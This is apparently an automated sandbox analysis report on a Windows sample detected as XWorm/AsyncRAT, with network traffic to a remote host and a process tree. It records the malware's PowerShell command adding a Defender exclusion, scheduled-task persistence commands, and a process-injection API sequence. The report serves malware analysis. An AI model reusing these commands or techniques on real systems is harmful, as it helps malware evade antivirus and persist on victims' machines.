                                                                      Nov 25, 2024 06:28:10.548856020 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:28:10.668309927 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:28:10.668355942 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:28:10.788639069 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:28:11.061686039 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:28:11.182142973 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:28:11.182198048 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:28:11.301657915 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:28:11.301707983 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:28:11.421624899 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:28:11.427418947 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:28:11.546886921 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:28:11.970057011 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:28:12.089894056 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:28:12.686772108 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:28:12.806337118 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:28:12.806505919 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:28:12.926009893 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:28:13.069282055 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:28:13.126064062 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:28:14.463332891 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:28:14.583353996 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:28:15.755742073 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:28:15.875327110 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:28:16.705473900 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:28:16.825056076 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:28:16.827461004 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:28:16.947004080 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:28:20.411338091 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:28:20.531065941 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:28:20.807631016 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:28:20.927356958 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:28:20.927406073 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:28:21.046868086 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:28:22.872056007 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:28:22.991636038 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:28:23.751351118 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:28:23.870906115 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:28:24.131230116 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:28:24.250911951 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:28:24.432094097 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:28:24.551695108 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:28:24.601260900 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:28:24.848011971 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:28:24.848088026 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:28:24.968420982 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:28:26.498641014 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:28:26.619112968 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:28:26.927558899 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:28:27.047096014 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:28:28.487765074 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:28:28.607436895 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:28:28.607481956 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:28:28.727098942 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:28:28.727140903 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:28:28.846678972 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:28:29.351336002 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:28:29.471000910 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:28:30.553886890 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:28:30.922863007 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:28:30.964472055 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:28:30.964523077 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:28:31.042380095 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:28:31.084222078 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:28:33.428558111 CET497357000192.168.2.418.181.154.24

                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      Click to dive into process behavior distribution

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Target ID:0
                                                                      Start time:00:24:56
                                                                      Start date:25/11/2024
                                                                      Path:C:\Users\user\Desktop\9758xBqgE1azKnB.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\9758xBqgE1azKnB.exe"
                                                                      Imagebase:0xbd0000
                                                                      File size:450'048 bytes
                                                                      MD5 hash:BF7866489443A237806A4D3D5701CDF3
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1714031582.000000000309C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1714031582.000000000309C000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:2
                                                                      Start time:00:24:57
                                                                      Start date:25/11/2024
                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe"
                                                                      Imagebase:0x4f0000
                                                                      File size:433'152 bytes
                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:3
                                                                      Start time:00:24:57
                                                                      Start date:25/11/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:4
                                                                      Start time:00:24:57
                                                                      Start date:25/11/2024
                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmpAD87.tmp"
                                                                      Imagebase:0x440000
                                                                      File size:187'904 bytes
                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:5
                                                                      Start time:00:24:57
                                                                      Start date:25/11/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:6
                                                                      Start time:00:24:58
                                                                      Start date:25/11/2024
                                                                      Path:C:\Users\user\Desktop\9758xBqgE1azKnB.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Users\user\Desktop\9758xBqgE1azKnB.exe"
                                                                      Imagebase:0xc0000
                                                                      File size:450'048 bytes
                                                                      MD5 hash:BF7866489443A237806A4D3D5701CDF3
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:7
                                                                      Start time:00:24:58
                                                                      Start date:25/11/2024
                                                                      Path:C:\Users\user\Desktop\9758xBqgE1azKnB.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\9758xBqgE1azKnB.exe"
                                                                      Imagebase:0xef0000
                                                                      File size:450'048 bytes
                                                                      MD5 hash:BF7866489443A237806A4D3D5701CDF3
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000007.00000002.3827541610.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:8
                                                                      Start time:00:24:59
                                                                      Start date:25/11/2024
                                                                      Path:C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe
                                                                      Imagebase:0x7b0000
                                                                      File size:450'048 bytes
                                                                      MD5 hash:BF7866489443A237806A4D3D5701CDF3
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000008.00000002.1747690067.0000000002BCA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000008.00000002.1747690067.0000000002BCA000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 58%, ReversingLabs
                                                                      • Detection: 55%, Virustotal, Browse
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:9
                                                                      Start time:00:24:59
                                                                      Start date:25/11/2024
                                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                      Imagebase:0x7ff693ab0000
                                                                      File size:496'640 bytes
                                                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:10
                                                                      Start time:00:25:01
                                                                      Start date:25/11/2024
                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmpBA0A.tmp"
                                                                      Imagebase:0x440000
                                                                      File size:187'904 bytes
                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:11
                                                                      Start time:00:25:01
                                                                      Start date:25/11/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:12
                                                                      Start time:00:25:01
                                                                      Start date:25/11/2024
                                                                      Path:C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe"
                                                                      Imagebase:0x160000
                                                                      File size:450'048 bytes
                                                                      MD5 hash:BF7866489443A237806A4D3D5701CDF3
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:13
                                                                      Start time:00:25:01
                                                                      Start date:25/11/2024
                                                                      Path:C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe"
                                                                      Imagebase:0xae0000
                                                                      File size:450'048 bytes
                                                                      MD5 hash:BF7866489443A237806A4D3D5701CDF3
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000D.00000002.1753363260.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000D.00000002.1753363260.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:14
                                                                      Start time:00:25:10
                                                                      Start date:25/11/2024
                                                                      Path:C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe"
                                                                      Imagebase:0xa80000
                                                                      File size:450'048 bytes
                                                                      MD5 hash:BF7866489443A237806A4D3D5701CDF3
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000E.00000002.1850299737.0000000002E55000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000E.00000002.1850299737.0000000002E55000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 58%, ReversingLabs
                                                                      • Detection: 55%, Virustotal, Browse
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:15
                                                                      Start time:00:25:11
                                                                      Start date:25/11/2024
                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmpE11A.tmp"
                                                                      Imagebase:0x440000
                                                                      File size:187'904 bytes
                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:16
                                                                      Start time:00:25:11
                                                                      Start date:25/11/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:17
                                                                      Start time:00:25:11
                                                                      Start date:25/11/2024
                                                                      Path:C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe"
                                                                      Imagebase:0xdb0000
                                                                      File size:450'048 bytes
                                                                      MD5 hash:BF7866489443A237806A4D3D5701CDF3
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:19
                                                                      Start time:00:25:18
                                                                      Start date:25/11/2024
                                                                      Path:C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe"
                                                                      Imagebase:0x1e0000
                                                                      File size:450'048 bytes
                                                                      MD5 hash:BF7866489443A237806A4D3D5701CDF3
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:22
                                                                      Start time:00:25:19
                                                                      Start date:25/11/2024
                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmp21F.tmp"
                                                                      Imagebase:0x440000
                                                                      File size:187'904 bytes
                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:23
                                                                      Start time:00:25:19
                                                                      Start date:25/11/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:24
                                                                      Start time:00:25:19
                                                                      Start date:25/11/2024
                                                                      Path:C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe"
                                                                      Imagebase:0x720000
                                                                      File size:450'048 bytes
                                                                      MD5 hash:BF7866489443A237806A4D3D5701CDF3
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:28
                                                                      Start time:00:28:30
                                                                      Start date:25/11/2024
                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6912 -s 1852
                                                                      Imagebase:0x180000
                                                                      File size:483'680 bytes
                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Disassembly

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:10.2%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:170
                                                                        Total number of Limit Nodes:8
                                                                        execution_graph 30179 150d650 DuplicateHandle 30180 150d6e6 30179->30180 30343 150d000 30344 150d046 GetCurrentProcess 30343->30344 30346 150d091 30344->30346 30347 150d098 GetCurrentThread 30344->30347 30346->30347 30348 150d0d5 GetCurrentProcess 30347->30348 30349 150d0ce 30347->30349 30350 150d10b 30348->30350 30349->30348 30351 150d133 GetCurrentThreadId 30350->30351 30352 150d164 30351->30352 30359 150ac70 30363 150ad58 30359->30363 30368 150ad68 30359->30368 30360 150ac7f 30364 150ad9c 30363->30364 30365 150ad79 30363->30365 30364->30360 30365->30364 30366 150afa0 GetModuleHandleW 30365->30366 30367 150afcd 30366->30367 30367->30360 30369 150ad9c 30368->30369 30370 150ad79 30368->30370 30369->30360 30370->30369 30371 150afa0 GetModuleHandleW 30370->30371 30372 150afcd 30371->30372 30372->30360 30373 78552f0 30374 785547b 30373->30374 30375 7855316 30373->30375 30375->30374 30378 7855570 PostMessageW 30375->30378 30380 7855568 30375->30380 30379 78555dc 30378->30379 30379->30375 30381 7855570 PostMessageW 30380->30381 30382 78555dc 30381->30382 30382->30375 30383 1504668 30384 150467a 30383->30384 30385 1504686 30384->30385 30387 1504789 30384->30387 30388 150479d 30387->30388 30391 1504888 30388->30391 30392 15048af 30391->30392 30393 150498c 30392->30393 30395 15044b4 30392->30395 30396 1505918 CreateActCtxA 30395->30396 30398 15059db 30396->30398 30181 7851649 30183 785158c 30181->30183 30182 78515c9 30182->30182 30183->30182 30187 7853fd0 30183->30187 30203 785403e 30183->30203 30220 7853fe0 30183->30220 30188 7853ffa 30187->30188 30199 785401e 30188->30199 30236 7854541 30188->30236 30241 7854cfa 30188->30241 30245 78549bb 30188->30245 30250 7854458 30188->30250 30255 7854a3e 30188->30255 30260 7854870 30188->30260 30264 7854830 30188->30264 30269 785452e 30188->30269 30274 7854b4f 30188->30274 30279 785478d 30188->30279 30283 78546c2 30188->30283 30287 7854e81 30188->30287 30291 7854621 30188->30291 30199->30183 30204 7854041 30203->30204 30205 7853fcc 30203->30205 30204->30183 30206 785401e 30205->30206 30207 7854541 2 API calls 30205->30207 30208 7854621 2 API calls 30205->30208 30209 7854e81 2 API calls 30205->30209 30210 78546c2 2 API calls 30205->30210 30211 785478d 2 API calls 30205->30211 30212 7854b4f 2 API calls 30205->30212 30213 785452e 2 API calls 30205->30213 30214 7854830 2 API calls 30205->30214 30215 7854870 2 API calls 30205->30215 30216 7854a3e 2 API calls 30205->30216 30217 7854458 2 API calls 30205->30217 30218 78549bb 2 API calls 30205->30218 30219 7854cfa 2 API calls 30205->30219 30206->30183 30207->30206 30208->30206 30209->30206 30210->30206 30211->30206 30212->30206 30213->30206 30214->30206 30215->30206 30216->30206 30217->30206 30218->30206 30219->30206 30221 7853ffa 30220->30221 30222 7854541 2 API calls 30221->30222 30223 7854621 2 API calls 30221->30223 30224 7854e81 2 API calls 30221->30224 30225 78546c2 2 API calls 30221->30225 30226 785478d 2 API calls 30221->30226 30227 7854b4f 2 API calls 30221->30227 30228 785452e 2 API calls 30221->30228 30229 7854830 2 API calls 30221->30229 30230 7854870 2 API calls 30221->30230 30231 7854a3e 2 API calls 30221->30231 30232 785401e 30221->30232 30233 7854458 2 API calls 30221->30233 30234 78549bb 2 API calls 30221->30234 30235 7854cfa 2 API calls 30221->30235 30222->30232 30223->30232 30224->30232 30225->30232 30226->30232 30227->30232 30228->30232 30229->30232 30230->30232 30231->30232 30232->30183 30233->30232 30234->30232 30235->30232 30237 785454e 30236->30237 30295 7850fd8 30237->30295 30299 7850fd0 30237->30299 30238 78545ed 30238->30199 30303 7850e20 30241->30303 30307 7850e28 30241->30307 30242 7854d18 30246 78549c1 30245->30246 30311 7850ca0 30246->30311 30315 7850c98 30246->30315 30247 785481e 30247->30199 30247->30247 30251 7854463 30250->30251 30319 7851164 30251->30319 30323 7851170 30251->30323 30252 78544ee 30252->30199 30256 78549d9 30255->30256 30257 785481e 30255->30257 30258 7850ca0 ResumeThread 30256->30258 30259 7850c98 ResumeThread 30256->30259 30257->30199 30258->30257 30259->30257 30261 78545ed 30260->30261 30262 7850fd0 ReadProcessMemory 30260->30262 30263 7850fd8 ReadProcessMemory 30260->30263 30261->30199 30262->30261 30263->30261 30265 7854836 30264->30265 30267 7850fd0 ReadProcessMemory 30265->30267 30268 7850fd8 ReadProcessMemory 30265->30268 30266 78545ed 30266->30199 30267->30266 30268->30266 30270 785453b 30269->30270 30327 7850ee0 30270->30327 30331 7850ee8 30270->30331 30271 7854516 30271->30199 30275 78549c2 30274->30275 30276 785481e 30275->30276 30277 7850ca0 ResumeThread 30275->30277 30278 7850c98 ResumeThread 30275->30278 30276->30199 30277->30276 30278->30276 30281 7850ee0 WriteProcessMemory 30279->30281 30282 7850ee8 WriteProcessMemory 30279->30282 30280 78547be 30281->30280 30282->30280 30285 7850ee0 WriteProcessMemory 30283->30285 30286 7850ee8 WriteProcessMemory 30283->30286 30284 78546e9 30285->30284 30286->30284 30335 7850d50 30287->30335 30339 7850d48 30287->30339 30288 7854e9b 30293 7850d50 Wow64SetThreadContext 30291->30293 30294 7850d48 Wow64SetThreadContext 30291->30294 30292 785463b 30292->30199 30293->30292 30294->30292 30296 7851023 ReadProcessMemory 30295->30296 30298 7851067 30296->30298 30298->30238 30300 7850fd8 ReadProcessMemory 30299->30300 30302 7851067 30300->30302 30302->30238 30304 7850e28 VirtualAllocEx 30303->30304 30306 7850ea5 30304->30306 30306->30242 30308 7850e68 VirtualAllocEx 30307->30308 30310 7850ea5 30308->30310 30310->30242 30312 7850ce0 ResumeThread 30311->30312 30314 7850d11 30312->30314 30314->30247 30316 7850ca0 ResumeThread 30315->30316 30318 7850d11 30316->30318 30318->30247 30320 7851170 CreateProcessA 30319->30320 30322 78513bb 30320->30322 30324 78511f9 CreateProcessA 30323->30324 30326 78513bb 30324->30326 30328 7850ee6 WriteProcessMemory 30327->30328 30330 7850f87 30328->30330 30330->30271 30332 7850f30 WriteProcessMemory 30331->30332 30334 7850f87 30332->30334 30334->30271 30336 7850d95 Wow64SetThreadContext 30335->30336 30338 7850ddd 30336->30338 30338->30288 30340 7850d50 Wow64SetThreadContext 30339->30340 30342 7850ddd 30340->30342 30342->30288 30353 78515d9 30355 785158c 30353->30355 30354 78515c9 30354->30354 30355->30354 30356 7853fd0 12 API calls 30355->30356 30357 7853fe0 12 API calls 30355->30357 30358 785403e 12 API calls 30355->30358 30356->30355 30357->30355 30358->30355

                                                                        Executed Functions

                                                                        Function 091F0040 Relevance: 15.6, Strings: 10, Instructions: 3130COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (otq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4|yq$4|yq$$tq
                                                                        • API String ID: 0-1537292367
                                                                        • Opcode ID: bdf144cbfed2e7b6448e47cbefb7a607c919e57e6b9e64f2905a64c95c8c488f
                                                                        • Instruction ID: d41cdc4c2ba7732610c9959ae4be84c4327859823b0af551e4eb97e3f2113504
                                                                        • Opcode Fuzzy Hash: bdf144cbfed2e7b6448e47cbefb7a607c919e57e6b9e64f2905a64c95c8c488f
                                                                        • Instruction Fuzzy Hash: 24631B74B04619CFCB24CF68C8A4A9DBBB2BF89314F158599E519AB361DB30ED81CF50
                                                                        Function 091F34B8 Relevance: 5.6, Strings: 4, Instructions: 562COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
